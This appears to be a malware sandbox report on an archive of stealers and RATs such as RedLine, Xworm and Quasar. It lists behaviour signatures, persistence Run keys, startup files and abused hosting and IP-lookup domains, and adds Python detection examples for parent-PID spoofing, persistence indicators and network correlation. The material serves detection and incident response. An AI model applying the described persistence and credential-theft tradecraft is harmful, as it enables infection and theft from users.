Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Redline family
Quasar RAT
RedLine payload
Lumma family
Quasar payload
Xworm family
Amadey
RedLine
Asyncrat family
Merlin
Quasar family
Lumma Stealer, LummaC
AsyncRat
Amadey family
Merlin payload
Detect Xworm Payload
Merlin family
Async RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Loads dropped DLL
Clipboard Data
Unsecured Credentials: Credentials In Files
Drops startup file
Reads user/profile data of web browsers
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Enumerates connected drives
Looks up external IP address via web service
Checks installed software on the system
Drops file in System32 directory
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
UPX packed file
Drops file in Windows directory
Drops file in Program Files directory
Detects Pyinstaller
Embeds OpenSSL
Event Triggered Execution: Netsh Helper DLL
Command and Scripting Interpreter: JavaScript
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies Internet Explorer settings
System policy modification
Modifies registry key
Gathers system information
Detects videocard installed
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Modifies Control Panel
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of WriteProcessMemory
Kills process with taskkill
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-14 20:13
Signatures
Unsigned PE
3 matches (no indicator, process or target recorded)
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-14 20:13
Reported
2024-12-14 20:22
Platform
win11-20241007-es
Max time kernel
264s
Max time network
554s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Xworm Payload
3 matches (no indicator, process or target recorded)
Lumma Stealer, LummaC
Lumma family
Merlin
Merlin family
Merlin payload
1 match (no indicator, process or target recorded)
Quasar RAT
Quasar family
Quasar payload
2 matches (no indicator, process or target recorded)
RedLine
RedLine payload
2 matches (no indicator, process or target recorded)
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4020 created 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | C:\Windows\Explorer.EXE |
| PID 4020 created 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | C:\Windows\Explorer.EXE |
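The row above records Paintball.com (PID 4020) creating a process whose recorded parent is Explorer.EXE (PID 3260), the parent-PID spoofing pattern behind this signature: the creator passes PROC_THREAD_ATTRIBUTE_PARENT_PROCESS so the child appears to descend from a benign process. Sysmon's process-creation event only reports the declared parent, so catching this needs a source that also records the calling process (kernel process-start ETW events carry the caller in the event header). The Python check below is an added example, not part of the report or of the sandbox's own signature code; its event layout, every PID other than 4020 and 3260, and the svchost.exe allow-list entry for UAC elevation are assumptions.

```python
"""Parent-PID spoofing check over process-creation events.

Added example; not part of the sandbox report or of any tool it names.
It assumes a telemetry source that records, for each new process, both
the process that made the creation call and the parent the new process
carries (the "declared" parent, which a caller can choose freely through
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS). The events are constructed to
mirror the row above: Paintball.com (PID 4020) creating a child whose
parent is recorded as Explorer.EXE (PID 3260).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessStart:
    pid: int          # the new process
    image: str        # its image path
    creator_pid: int  # process that actually called NtCreateUserProcess
    parent_pid: int   # parent recorded on the new process


# Creators that legitimately re-parent children: the AppInfo service
# (hosted in svchost.exe) starts UAC-elevated processes on behalf of the
# requesting process and records that process as the parent.
BENIGN_REPARENTING_CREATORS = {r"c:\windows\system32\svchost.exe"}

# Constructed sample events (PIDs other than 4020 and 3260 are invented).
SAMPLE_EVENTS = [
    ProcessStart(3260, r"C:\Windows\Explorer.EXE", 900, 900),
    ProcessStart(1200, r"C:\Windows\System32\svchost.exe", 700, 700),
    ProcessStart(4020, r"C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com", 3100, 3100),
    # UAC elevation: svchost (AppInfo) creates mmc.exe with the requester (3100) as parent.
    ProcessStart(6001, r"C:\Windows\System32\mmc.exe", 1200, 3100),
    # Spoofed: Paintball.com creates cmd.exe but declares Explorer as its parent.
    ProcessStart(5104, r"C:\Windows\SysWOW64\cmd.exe", 4020, 3260),
    ProcessStart(5222, r"C:\Windows\System32\conhost.exe", 5104, 5104),
]


def find_spoofed_parents(events):
    """Return one finding per process whose creator differs from its recorded parent."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.creator_pid == e.parent_pid:
            continue
        creator = by_pid.get(e.creator_pid)
        if creator is not None and creator.image.lower() in BENIGN_REPARENTING_CREATORS:
            continue
        parent = by_pid.get(e.parent_pid)
        findings.append({
            "pid": e.pid,
            "image": e.image,
            "creator_pid": e.creator_pid,
            "creator_image": creator.image if creator else "<unknown>",
            "declared_parent_pid": e.parent_pid,
            "declared_parent_image": parent.image if parent else "<unknown>",
        })
    return findings


if __name__ == "__main__":
    for f in find_spoofed_parents(SAMPLE_EVENTS):
        print(f"PID {f['creator_pid']} ({f['creator_image']}) created PID {f['pid']} "
              f"({f['image']}) parented to PID {f['declared_parent_pid']} "
              f"({f['declared_parent_image']})")
```

The allow-list is the part that needs tuning per environment: UAC elevation is the common benign re-parenting case, and anything else where the caller and the recorded parent disagree deserves a look at the caller's image path, which here points into a user's Temp directory.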
Xworm
Xworm family
Async RAT payload
1 match (no indicator, process or target recorded)
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| 7 network requests | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| 1 network request | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
The attrib.exe rows are attribute changes on the hosts file (the sandbox logs the write-access open), the usual step before a dropper such as phost.exe rewrites it; the content written is not captured here, so the hosts file on an affected machine has to be diffed against a clean copy.
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Windows\system32\audiodg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe | N/A |
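The "Drops startup file" and "Adds Run key to start application" tables above are the persistence evidence a responder turns into a hunt list, and the Run key rows carry a second signal: the same value (Services, pointing at 07968106F50A1448456937.exe) is written by msiexec.exe, audiodg.exe and Update.exe. audiodg.exe has no legitimate reason to write a Run value, so multiple writers for one value points at injection into host processes. The parser below is an added example, not part of the report; it reads rows in the page's own table layout, copied from the two tables (duplicate "opened for modification" rows left out, as are the BingWallpaperApp row, which matches what that app's installer writes, and the RunOnce wextract_cleanup0 rows, which are the standard IExpress/WExtract self-cleanup entry, since both need vetting rather than automatic blocking). The hive mapping and the "writer under C:\Windows" heuristic are assumptions of the example.

```python
"""Persistence IOC extraction from the report's indicator tables.

Added example; not part of the report. Rows in the page's
"| Description | Indicator | Process | Target |" layout are parsed into
a normalised hunt list: location, value or file name, the binary that
will run, and the process that wrote the entry.
"""
import re
from collections import defaultdict

# Rows copied verbatim from the "Drops startup file" and "Adds Run key to
# start application" tables above (a subset, see the lead-in).
ROWS = r"""
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Windows\system32\audiodg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe | N/A |
"""

# <key path>\<value name> = "<data>", as the report renders REG_SZ writes.
RUN_VALUE = re.compile(r'^(?P<key>.+)\\(?P<name>[^\\]+) = "(?P<data>.*)"$')
HIVES = (("\\REGISTRY\\MACHINE", "HKLM"), ("\\REGISTRY\\USER", "HKU"))


def friendly_key(native_path):
    """Map the kernel-style \\REGISTRY\\MACHINE and \\REGISTRY\\USER prefixes to HKLM and HKU."""
    for prefix, hive in HIVES:
        if native_path.upper().startswith(prefix):
            return hive + native_path[len(prefix):]
    return native_path


def parse_rows(text):
    """Turn table rows into persistence entries (run_key or startup_folder)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":
            continue
        desc, indicator, writer, _target = cells
        if desc.startswith("Set value"):
            m = RUN_VALUE.match(indicator)
            if m is None:
                continue
            entries.append({
                "kind": "run_key",
                "location": friendly_key(m["key"]),
                "name": m["name"],
                # the report doubles backslashes inside REG_SZ data
                "target": m["data"].replace("\\\\", "\\"),
                "writer": writer,
            })
        elif desc == "File created":
            folder, _, name = indicator.rpartition("\\")
            entries.append({"kind": "startup_folder", "location": folder,
                            "name": name, "target": None, "writer": writer})
    return entries


def writers_by_entry(entries):
    """Distinct writing processes per (kind, name); more than one usually means injection."""
    grouped = defaultdict(set)
    for e in entries:
        grouped[(e["kind"], e["name"])].add(e["writer"])
    return {k: sorted(v) for k, v in grouped.items()}


def system_binary_writers(entries):
    """Entries written by a binary under C:\\Windows: installer action, script, or injected host."""
    return [e for e in entries if e["writer"].lower().startswith("c:\\windows\\")]


if __name__ == "__main__":
    entries = parse_rows(ROWS)
    for (kind, name), writers in writers_by_entry(entries).items():
        print(f"{kind:15} {name:22} writers={len(writers)}")
    for e in system_binary_writers(entries):
        print(f"vet: {e['name']} <- {e['writer']}")
```

The output is what goes into the hunt: the Run value names and startup-folder file names to search for across the fleet, the target paths under AppData\Roaming and C:\Windows\sysnldcvmr.exe to collect, and the list of system binaries that wrote them, which on a live host tells you which processes to memory-dump.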
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only), 23 drive letters | \??\A:, B:, E:, G:, H:, I:, J:, K:, L:, M:, N:, O:, P:, Q:, R:, S:, T:, U:, V:, W:, X:, Y:, Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only), 23 drive letters | \??\A:, B:, E:, G:, H:, I:, J:, K:, L:, M:, N:, O:, P:, Q:, R:, S:, T:, U:, V:, W:, X:, Y:, Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
64 rows collapsed by indicator (no process or target recorded):
| Indicator | Occurrences |
| discord.com | 49 |
| raw.githubusercontent.com | 12 |
| bitbucket.org | 2 |
| pastebin.com | 1 |
Looks up external IP address via web service
12 rows collapsed by indicator (no process or target recorded):
| Indicator | Occurrences |
| ipapi.co | 5 |
| api.ipify.org | 4 |
| ip-api.com | 3 |
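Neither table above is blockable on its own: discord.com, raw.githubusercontent.com, bitbucket.org and pastebin.com carry legitimate traffic, and the IP-lookup services are hit by plenty of benign software. What is characteristic of the stealer and RAT families flagged in this report is the combination, a public-IP lookup to fingerprint the victim followed closely by payload fetches or loot uploads to a legitimate hosting service. The correlation below is an added example, not part of the report; its domain sets are the ones in the two tables, while the log format ("<ISO timestamp> <client IP> <destination host>"), the log lines and the ten-minute default window are assumptions.

```python
"""Correlate external-IP lookups with traffic to abused legitimate services.

Added example; not part of the report. Flags a client only when it
contacts an IP-lookup service and an abused hosting service within a
short window, which is the behaviour both tables above describe.
"""
from datetime import datetime, timedelta

# Domain sets taken from the two signature tables above.
IP_LOOKUP_SERVICES = {"api.ipify.org", "ip-api.com", "ipapi.co"}
ABUSED_HOSTING = {"discord.com", "raw.githubusercontent.com", "bitbucket.org", "pastebin.com"}

# Constructed sample proxy/DNS export (not from the sandbox's capture).
SAMPLE_LOG = """\
2024-12-14T20:14:02 10.0.0.15 api.ipify.org
2024-12-14T20:14:05 10.0.0.15 discord.com
2024-12-14T20:14:09 10.0.0.15 raw.githubusercontent.com
2024-12-14T20:15:30 10.0.0.22 discord.com
2024-12-14T20:40:00 10.0.0.22 ip-api.com
2024-12-14T21:05:00 10.0.0.40 ipapi.co
2024-12-14T21:05:01 10.0.0.40 ipapi.co
"""


def parse_log(text):
    """Return (timestamp, client, host) tuples; malformed or blank lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, client, host = parts
        events.append((datetime.fromisoformat(ts), client, host.lower()))
    return events


def correlate(events, window_minutes=10):
    """Clients that hit an IP-lookup service and an abused hosting service within the window.

    Returns {client: [(lookup_host, lookup_time, hosting_host, hosting_time), ...]}.
    """
    window = timedelta(minutes=window_minutes)
    per_client = {}
    for ts, client, host in events:
        per_client.setdefault(client, []).append((ts, host))
    hits = {}
    for client, evs in per_client.items():
        lookups = [(t, h) for t, h in evs if h in IP_LOOKUP_SERVICES]
        hosting = [(t, h) for t, h in evs if h in ABUSED_HOSTING]
        pairs = [(lh, lt, hh, ht)
                 for lt, lh in lookups
                 for ht, hh in hosting
                 if abs(ht - lt) <= window]
        if pairs:
            hits[client] = sorted(pairs, key=lambda p: (p[1], p[3]))
    return hits


if __name__ == "__main__":
    for client, pairs in correlate(parse_log(SAMPLE_LOG)).items():
        for lookup_host, lookup_time, hosting_host, hosting_time in pairs:
            print(f"{client}: {lookup_host} at {lookup_time:%H:%M:%S} "
                  f"then {hosting_host} at {hosting_time:%H:%M:%S}")
```

In the sample only 10.0.0.15 fires with the default window; 10.0.0.22 does both but 24 minutes apart and only appears when the window is widened, and 10.0.0.40 performs lookups alone. The window is the tuning knob: the sandbox run shows the two activities interleaved within a few minutes, so a short window keeps the rule quiet on hosts that merely run an IP-lookup widget.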
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| 6 invocations | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| 5 invocations | N/A | C:\Windows\system32\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
64 matches (no indicator, process or target recorded)
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification (9 times) | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification (9 times) | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sas.dll | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sthooks.dll | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF793DC10DA9572D25.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFDFB63DB7F55637BF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\InternshipWant | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\GovernmentalPoetry | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5af28f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\MoBelongs | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF406.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\JpegSuse | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFE6D59846241A2593.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Windows\Installer\e5af28f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4EF8ECC2C6C84C85.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5af293.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\JpgCelebrity | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
